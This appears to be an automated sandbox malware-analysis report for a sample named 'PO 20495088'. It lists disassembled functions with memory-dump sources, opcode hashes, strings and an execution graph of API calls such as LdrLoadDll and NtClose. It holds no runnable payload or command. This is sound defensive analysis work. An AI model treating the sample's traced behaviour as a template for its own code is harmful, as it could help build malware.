                                                                                                        • Source File: 00000000.00000002.2368528787.000000000AD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ad50000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: d040f62e5902768d86e80e0d13110782413225894d46e0f4d832fc1ed7b58472
                                                                                                        • Instruction ID: 991976b35c5c9ae129d555dc604f15e093e760181c80904110c5c7afcc1c2a1b
                                                                                                        • Opcode Fuzzy Hash: d040f62e5902768d86e80e0d13110782413225894d46e0f4d832fc1ed7b58472
                                                                                                        • Instruction Fuzzy Hash: 3FF039750093989FDB079BA0C965CD43FB5EF0321570A85DBE4858F132C735C99ACBA2
                                                                                                        Function 0AD50930 Relevance: .0, Instructions: 25COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2368528787.000000000AD50000.00000040.00000800.00020000.00000000.sdmp, Offset: 0AD50000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_ad50000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2189365bae1c72af35a5a32303984b11c6574c8b1aea3c63adc32d3cb9a0c44e
                                                                                                        • Instruction ID: 5f9544c60cab0d63ae977a9dfb343623677e7cccf2477535e910ad562909110b
                                                                                                        • Opcode Fuzzy Hash: 2189365bae1c72af35a5a32303984b11c6574c8b1aea3c63adc32d3cb9a0c44e
                                                                                                        • Instruction Fuzzy Hash: E2E030B0D012169FDB60DF7E880576BBEF4AF49300F154829D449E3204EB708900CF91
                                                                                                        Function 054FFC98 Relevance: .0, Instructions: 20COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 08045455d1cfeb6ba3fe20ffcea3c1ab92d9661574ee497efc1e59f07c698f86
                                                                                                        • Instruction ID: 64f55412f01c6c5628909d6fb0ef9b1d0fd8db618c1c017e18e15ca04129b60c
                                                                                                        • Opcode Fuzzy Hash: 08045455d1cfeb6ba3fe20ffcea3c1ab92d9661574ee497efc1e59f07c698f86
                                                                                                        • Instruction Fuzzy Hash: 3CE0C23091524CE7CB00EBBCD444AED7BB9BB01315F1084AACA0693340EB305A489B82

                                                                                                        Non-executed Functions

                                                                                                        Function 054F9BE8 Relevance: 7.0, Strings: 5, Instructions: 723COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (oeq$(oeq$,iq$,iq$Hiq
                                                                                                        • API String ID: 0-2750058203
                                                                                                        • Opcode ID: 16eae2fccef6d89cb254e3c808a979bddd65eace691f94221b21e72acd15340e
                                                                                                        • Instruction ID: d840db04a7558998fd4487d20d8084291456c4f1fd143e9d786d24f2f8b442db
                                                                                                        • Opcode Fuzzy Hash: 16eae2fccef6d89cb254e3c808a979bddd65eace691f94221b21e72acd15340e
                                                                                                        • Instruction Fuzzy Hash: 79528435B005159FCB14DF6ED488AAE7BB2FF84310B15816AE916DB364DB31EC41CB91
                                                                                                        Function 0748B960 Relevance: 1.6, Strings: 1, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: |[Yy
                                                                                                        • API String ID: 0-585379564
                                                                                                        • Opcode ID: 470cef98c5b3a9aed3473c40c4e4863f722a9f067c5418c7530cd7f771642807
                                                                                                        • Instruction ID: cd99e01bf038100b0e780600b27fbcd46115b27ee7235c2d536fc4dca862cde8
                                                                                                        • Opcode Fuzzy Hash: 470cef98c5b3a9aed3473c40c4e4863f722a9f067c5418c7530cd7f771642807
                                                                                                        • Instruction Fuzzy Hash: 8AE10AB4E001198FCB54DFA9C5809AEFBF2FF89305F24816AD815AB356DB31A941CF60
                                                                                                        Function 0748B950 Relevance: 1.4, Strings: 1, Instructions: 133COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: |[Yy
                                                                                                        • API String ID: 0-585379564
                                                                                                        • Opcode ID: ace0b3f9c880b9eb3abc1cf817a2cf32a8a5cdf4f13578b1c4b23903eeca3b97
                                                                                                        • Instruction ID: cc87a0cb28af39a255bb4ad2ab8dd6488229741227f1a490b69001d89a2a79ed
                                                                                                        • Opcode Fuzzy Hash: ace0b3f9c880b9eb3abc1cf817a2cf32a8a5cdf4f13578b1c4b23903eeca3b97
                                                                                                        • Instruction Fuzzy Hash: C051F8B4E012198FDB54DFA9C5805AEBBF2FF89304F24C16AD418AB355DB319942CF61
                                                                                                        Function 054E0040 Relevance: .3, Instructions: 315COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345576448.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54e0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e1fcbb0e0f73ef03f3e0bb90eba4aa81584a9671cbe9990374fff5366e72db88
                                                                                                        • Instruction ID: c050ed0ffd5cf45e732d1331e5d722b1abba51e6aa92fdd15f7981b93a6cdd7a
                                                                                                        • Opcode Fuzzy Hash: e1fcbb0e0f73ef03f3e0bb90eba4aa81584a9671cbe9990374fff5366e72db88
                                                                                                        • Instruction Fuzzy Hash: 1212B8F0C96749CAD710CF65E9CC189BBB1B741398FD08A0AD2621E2E9D7F4156ACF44
                                                                                                        Function 0748A2B8 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 0ff9ba42744ddbc5297fddd707e972420d3bc87833b5416da175e1ea0936125e
                                                                                                        • Instruction ID: d0cf352acdfc5cf794dbe9fab85aaffb1fd91b1c00b94f7fb194b3a7cbc9721f
                                                                                                        • Opcode Fuzzy Hash: 0ff9ba42744ddbc5297fddd707e972420d3bc87833b5416da175e1ea0936125e
                                                                                                        • Instruction Fuzzy Hash: E5E12BB4E041198FCB54DFA8C5809AEFBB2FF89305F24C16AD415AB359DB70A981CF60
                                                                                                        Function 07489E80 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: be9f10ca267bccfb2a7df56121a60f1a3f3e692cc4bb1af66291e2ef29fe49f9
                                                                                                        • Instruction ID: cc976a6467e93d95cb6389b140bc74c8f02961ba79f764fe55bc137a20260878
                                                                                                        • Opcode Fuzzy Hash: be9f10ca267bccfb2a7df56121a60f1a3f3e692cc4bb1af66291e2ef29fe49f9
                                                                                                        • Instruction Fuzzy Hash: 76E12AB4E001198FCB54EFA9C5809AEFBB2FF89305F24C16AE415AB355D771A981CF60
                                                                                                        Function 0748BD98 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 612503841f5e33173e3c374ca110f56524f248c2851e4e9b2c983bf6c3d47d59
                                                                                                        • Instruction ID: 8cffc5be19e54e9b41257561c0ca22e5dbe832f71d9275bfca8a676367f59893
                                                                                                        • Opcode Fuzzy Hash: 612503841f5e33173e3c374ca110f56524f248c2851e4e9b2c983bf6c3d47d59
                                                                                                        • Instruction Fuzzy Hash: 67E11BB4E041198FCB54DFA9C5809AEFBF2FF89345F24816AE415AB355DB30A981CF60
                                                                                                        Function 07489A48 Relevance: .3, Instructions: 312COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 2cbb23291ac5b43d52aaf6edb1469fbc30953f6e5058e870b96e7ea217bcbcbe
                                                                                                        • Instruction ID: 5b15cec9e347e1f4e549a535765ca9d23918a6faa820b627e8f7d2b9afba4616
                                                                                                        • Opcode Fuzzy Hash: 2cbb23291ac5b43d52aaf6edb1469fbc30953f6e5058e870b96e7ea217bcbcbe
                                                                                                        • Instruction Fuzzy Hash: 37E12AB4E045198FCB54EFA9C5809AEFBF2FF89305F24816AE415AB355D730A941CF60
                                                                                                        Function 074816C3 Relevance: .3, Instructions: 274COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 92df332f14048f22ecd6b44dd8ad0b965e32191d7672d79f9533adda129ba860
                                                                                                        • Instruction ID: 7ec34bf4cdbf299c74cf506974529a95d11620c14deab2796fd5a9643dd30f14
                                                                                                        • Opcode Fuzzy Hash: 92df332f14048f22ecd6b44dd8ad0b965e32191d7672d79f9533adda129ba860
                                                                                                        • Instruction Fuzzy Hash: ADE11871D2061A8ACB15EF64D9906DDB7B2FFA5310F50C79AE00977225EF706AC4CB80
                                                                                                        Function 0158EEA4 Relevance: .3, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2338217909.0000000001580000.00000040.00000800.00020000.00000000.sdmp, Offset: 01580000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_1580000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b40bc62827e9d64aff7cd33a8404293ac770e47b6f134a203ec2502b503579a4
                                                                                                        • Instruction ID: 4b97b14f8c0dd39f096d36220e0e89954bdd891af9514d442814931693846b0b
                                                                                                        • Opcode Fuzzy Hash: b40bc62827e9d64aff7cd33a8404293ac770e47b6f134a203ec2502b503579a4
                                                                                                        • Instruction Fuzzy Hash: 2CA17032E0020A8FDF05EFB5C88459EBBB2FF89304B15456AE915BF265DB31E916CB50
                                                                                                        Function 074816F8 Relevance: .3, Instructions: 264COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a9058edc74dde7302931c21387d7d468e644aad7cc1d373b43b1c43dfb403b22
                                                                                                        • Instruction ID: 177c2b3490d562535c7ae5b31b41b1ad355c63a0982a686ad48d2571aab4bffa
                                                                                                        • Opcode Fuzzy Hash: a9058edc74dde7302931c21387d7d468e644aad7cc1d373b43b1c43dfb403b22
                                                                                                        • Instruction Fuzzy Hash: 0ED11971D2061A8ACB15EF64D9906DDB7B6FFA5310F50C79AE00937225EF706AC4CB80
                                                                                                        Function 054E0006 Relevance: .2, Instructions: 238COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345576448.00000000054E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054E0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54e0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 152638d54feb81cb11066c8de2fa2ccaa456b55bc4c200cc54480a08417777ad
                                                                                                        • Instruction ID: 4475e273e3ae2b6da8f3c9c1707c38850899c0f88695b0a4a0df857ef131ed67
                                                                                                        • Opcode Fuzzy Hash: 152638d54feb81cb11066c8de2fa2ccaa456b55bc4c200cc54480a08417777ad
                                                                                                        • Instruction Fuzzy Hash: 9BC10BB0C9674D8BD710CF74E98C189BBB1BB45394F908A0AD1626F2E9DBF4146ACF44
                                                                                                        Function 0748E4B6 Relevance: .0, Instructions: 29COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2360172786.0000000007480000.00000040.00000800.00020000.00000000.sdmp, Offset: 07480000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_7480000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dfae2514ccb66e8ee4b51549694e8e49474ec55ec4652dfc8ae724e081bc3dc8
                                                                                                        • Instruction ID: 60fe703a2b2d9e02e52589a069358c914d72c8b4e95b8a19764736b8121c87ef
                                                                                                        • Opcode Fuzzy Hash: dfae2514ccb66e8ee4b51549694e8e49474ec55ec4652dfc8ae724e081bc3dc8
                                                                                                        • Instruction Fuzzy Hash: 0AE030B4C5D12CCBC7909E80D0482FCB778BB4B262F00A492D00EA2211D77049859B00
                                                                                                        Function 054F22A1 Relevance: 7.6, Strings: 6, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                                                                                                        • API String ID: 0-3857966652
                                                                                                        • Opcode ID: 7ff8fa26e2e04b8b4b30f2b5516ae51bef774e67b41afb090c650ea5359ba3d7
                                                                                                        • Instruction ID: 2dd54f70617a9948c2f73802c7c00ddf4a6d837f6e7f04380355f030fb654f82
                                                                                                        • Opcode Fuzzy Hash: 7ff8fa26e2e04b8b4b30f2b5516ae51bef774e67b41afb090c650ea5359ba3d7
                                                                                                        • Instruction Fuzzy Hash: 20413170D4110E8FC744EF65E89156EBBB6FB44241BD08969D015AB3ACEB747E14CF90
                                                                                                        Function 054F22B0 Relevance: 7.6, Strings: 6, Instructions: 95COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.2345609906.00000000054F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 054F0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_54f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'eq$4'eq$4'eq$4'eq$4'eq$4'eq
                                                                                                        • API String ID: 0-3857966652
                                                                                                        • Opcode ID: 4871f02f82a1abd0873feafb8e2af65ff0a934ff97071b52d55537b3a1c05a1a
                                                                                                        • Instruction ID: ea55a6230868e5245ff66ff776c89e02e720dd81579e505a52f929bcb15e732f
                                                                                                        • Opcode Fuzzy Hash: 4871f02f82a1abd0873feafb8e2af65ff0a934ff97071b52d55537b3a1c05a1a
                                                                                                        • Instruction Fuzzy Hash: 1F410E70D4120E8FCB48EF69E49156EBBB2FB44241BD08969D015AB2ACEB747D15CF90

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:1.2%
                                                                                                        Dynamic/Decrypted Code Coverage:4.8%
                                                                                                        Signature Coverage:7.6%
                                                                                                        Total number of Nodes:145
                                                                                                        Total number of Limit Nodes:14
                                                                                                        execution_graph 90773 42bd43 90774 42bd60 90773->90774 90777 1762df0 LdrInitializeThunk 90774->90777 90775 42bd85 90777->90775 90778 424b63 90779 424b7f 90778->90779 90780 424ba7 90779->90780 90781 424bbb 90779->90781 90782 42c6f3 NtClose 90780->90782 90788 42c6f3 90781->90788 90785 424bb0 90782->90785 90784 424bc4 90791 42e853 RtlAllocateHeap 90784->90791 90787 424bcf 90789 42c70d 90788->90789 90790 42c71b NtClose 90789->90790 90790->90784 90791->90787 90858 42f7d3 90859 42f7e3 90858->90859 90860 42f7e9 90858->90860 90861 42e813 RtlAllocateHeap 90860->90861 90862 42f80f 90861->90862 90863 424ef3 90864 424f0c 90863->90864 90865 424f57 90864->90865 90868 424f9a 90864->90868 90870 424f9f 90864->90870 90866 42e733 RtlFreeHeap 90865->90866 90867 424f67 90866->90867 90869 42e733 RtlFreeHeap 90868->90869 90869->90870 90792 41e6e3 90793 41e709 90792->90793 90799 41e803 90793->90799 90801 42f903 90793->90801 90795 41e798 90797 41e7fa 90795->90797 90795->90799 90812 42bd93 90795->90812 90797->90799 90807 428b23 90797->90807 90800 41e8b8 90802 42f873 90801->90802 90804 42f8d0 90802->90804 90816 42e813 90802->90816 90804->90795 90805 42f8ad 90819 42e733 90805->90819 90808 428b88 90807->90808 90809 428bc3 90808->90809 90828 418e13 90808->90828 90809->90800 90811 428ba5 90811->90800 90813 42bdb0 90812->90813 90835 1762c0a 90813->90835 90814 42bdd9 90814->90797 90822 42ca03 90816->90822 90818 42e82b 90818->90805 90825 42ca53 90819->90825 90821 42e749 90821->90804 90823 42ca20 90822->90823 90824 42ca2e RtlAllocateHeap 90823->90824 90824->90818 90826 42ca6d 90825->90826 90827 42ca7b RtlFreeHeap 90826->90827 90827->90821 90829 418dec 90828->90829 90829->90828 90830 418dfb 90829->90830 90832 42ca93 90829->90832 90830->90811 90833 42cab0 90832->90833 90834 42cac1 ExitProcess 90833->90834 90834->90830 90836 1762c11 90835->90836 90837 1762c1f LdrInitializeThunk 90835->90837 90836->90814 90837->90814 90838 4143a3 90839 4143bd 90838->90839 90844 417a63 90839->90844 90841 4143d8 90842 41441d 90841->90842 90843 41440c PostThreadMessageW 90841->90843 90843->90842 90845 417a87 90844->90845 90846 417ac3 LdrLoadDll 90845->90846 90847 417a8e 90845->90847 90846->90847 90847->90841 90871 41b513 90872 41b557 90871->90872 90873 41b578 90872->90873 90874 42c6f3 NtClose 90872->90874 90874->90873 90875 1762b60 LdrInitializeThunk 90848 413e89 90849 413e3b 90848->90849 90852 413e98 90848->90852 90853 42c973 90849->90853 90854 42c98d 90853->90854 90857 1762c70 LdrInitializeThunk 90854->90857 90855 413e65 90857->90855 90876 419018 90877 42c6f3 NtClose 90876->90877 90878 419022 90877->90878 90879 4019fb 90880 401a0b 90879->90880 90880->90879 90883 42fca3 90880->90883 90886 42e2f3 90883->90886 90887 42e319 90886->90887 90898 407403 90887->90898 90889 42e32f 90897 401b37 90889->90897 90901 41b323 90889->90901 90891 42e363 90912 428433 90891->90912 90892 42e34e 90892->90891 90893 42ca93 ExitProcess 90892->90893 90893->90891 90895 42e37d 90896 42ca93 ExitProcess 90895->90896 90896->90897 90916 416793 90898->90916 90900 407410 90900->90889 90902 41b34f 90901->90902 90927 41b213 90902->90927 90905 41b37c 90906 41b387 90905->90906 90909 42c6f3 NtClose 90905->90909 90906->90892 90907 41b3b0 90907->90892 90908 41b394 90908->90907 90910 42c6f3 NtClose 90908->90910 90909->90906 90911 41b3a6 90910->90911 90911->90892 90913 428495 90912->90913 90915 4284a2 90913->90915 90938 4188d3 90913->90938 90915->90895 90917 4167b0 90916->90917 90919 4167c3 90917->90919 90920 42d113 90917->90920 90919->90900 90922 42d12d 90920->90922 90921 42d15c 90921->90919 90922->90921 90923 42bd93 LdrInitializeThunk 90922->90923 90924 42d1b6 90923->90924 90925 42e733 RtlFreeHeap 90924->90925 90926 42d1cf 90925->90926 90926->90919 90928 41b22d 90927->90928 90932 41b309 90927->90932 90933 42be23 90928->90933 90931 42c6f3 NtClose 90931->90932 90932->90905 90932->90908 90934 42be3d 90933->90934 90937 17635c0 LdrInitializeThunk 90934->90937 90935 41b2fd 90935->90931 90937->90935 90940 4188fd 90938->90940 90939 418dfb 90939->90915 90940->90939 90946 414023 90940->90946 90942 418a24 90942->90939 90943 42e733 RtlFreeHeap 90942->90943 90944 418a3c 90943->90944 90944->90939 90945 42ca93 ExitProcess 90944->90945 90945->90939 90950 414040 90946->90950 90948 41409c 90948->90942 90949 4140a6 90949->90942 90950->90949 90951 41b633 RtlFreeHeap LdrInitializeThunk 90950->90951 90951->90948

                                                                                                        Executed Functions

                                                                                                        Function 00417A63 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 198 417a63-417a7f 199 417a87-417a8c 198->199 200 417a82 call 42f313 198->200 201 417a92-417aa0 call 42f913 199->201 202 417a8e-417a91 199->202 200->199 205 417ab0-417ac1 call 42ddc3 201->205 206 417aa2-417aad call 42fbb3 201->206 211 417ac3-417ad7 LdrLoadDll 205->211 212 417ada-417add 205->212 206->205 211->212
                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AD5
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        • Opcode ID: 13db1cbfee882b855c2b2c2192e204c7396c591798c4373b0270ce1433d0553e
                                                                                                        • Instruction ID: b9c6e009b73b5ae58773c68f4c3761a1d2a249290bdbacd9d6936241b7e41e42
                                                                                                        • Opcode Fuzzy Hash: 13db1cbfee882b855c2b2c2192e204c7396c591798c4373b0270ce1433d0553e
                                                                                                        • Instruction Fuzzy Hash: 75015EB1E0020DABDF10DBE1DC42FDEB3789F14308F4081AAE90897241F634EB588B95
                                                                                                        Function 0042C6F3 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 240 42c6f3-42c729 call 404803 call 42d8e3 NtClose
                                                                                                        APIs
                                                                                                        • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C724
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2583565669.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_400000_PO 20495088.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Close
                                                                                                        • String ID:
                                                                                                        • API String ID: 3535843008-0
                                                                                                        • Opcode ID: 991bd70cd18074ebea09832eaf9822568eb3c0bd9119a204aa57d0389f26078d
                                                                                                        • Instruction ID: 45f497414757547f8beb1b3252d1ee666934aacdfa14a46942fa06b2a35df88f
                                                                                                        • Opcode Fuzzy Hash: 991bd70cd18074ebea09832eaf9822568eb3c0bd9119a204aa57d0389f26078d
                                                                                                        • Instruction Fuzzy Hash: 7EE086766042147BC210FA9ADC01F97775CDFC5724F508419FA4C67241C679B901C7F4
                                                                                                        Function 01762B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 254 1762b60-1762b6c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                        • Instruction ID: 6337b76b7c43efd9f372869b640c8484cec07f3ad79985103abda25e8bdfebe6
                                                                                                        • Opcode Fuzzy Hash: 31621645318e66b44b8fd572ae59d8afbbd2d217c074c4f39523de17d0a02042
                                                                                                        • Instruction Fuzzy Hash: EA90026120650003460571588418616800A97E0201F56C031E10145A0DC5258A916226
                                                                                                        Function 01762DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 256 1762df0-1762dfc LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                        • Instruction ID: cea4abfb9cc1eb233845dc36da57caeb39240fba3e9cd19a742e2b05b132e912
                                                                                                        • Opcode Fuzzy Hash: 340241332a4b44b69e3a1e6ccc4aa3503a2deb70cbfd23ec5af99b7da23d5624
                                                                                                        • Instruction Fuzzy Hash: C890023120550413D61171588508707400997D0241F96C432A0424568DD6568B52A222
                                                                                                        Function 01762C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 255 1762c70-1762c7c LdrInitializeThunk
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000006.00000002.2584440683.00000000016F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 016F0000, based on PE: true
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_6_2_16f0000_PO 20495088.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
